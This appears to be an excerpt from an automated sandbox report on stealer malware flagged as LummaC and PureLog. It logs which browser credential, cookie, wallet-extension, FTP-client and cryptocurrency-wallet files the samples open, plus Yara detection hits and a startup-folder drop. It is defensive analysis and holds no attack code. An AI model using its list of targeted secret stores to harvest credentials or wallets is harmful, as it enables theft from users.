Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG

Source: Yara match	File source: 00000016.00000003.2366762496.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1396029487.0000000001192000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1375749283.0000000001190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1385427683.000000000119A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2367847779.000000000327A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2367332906.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1395821864.0000000001192000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1361884238.0000000001192000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1359925992.0000000001190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2318496725.000000000137E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2X0520.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JqGBbm7.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: khykuQw.exe PID: 7116, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 2X0520.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JqGBbm7.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: khykuQw.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: 22.2.khykuQw.exe.e60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.zY9sqWs.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.zY9sqWs.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.2X0520.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2534632505.000000000058A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2514951557.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\zY9sqWs[1].exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 33.2.d0HNrLB.exe.34f9550.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.d0HNrLB.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.2562200022.0000000003509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.2413994980.0000000000512000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe, type: DROPPED
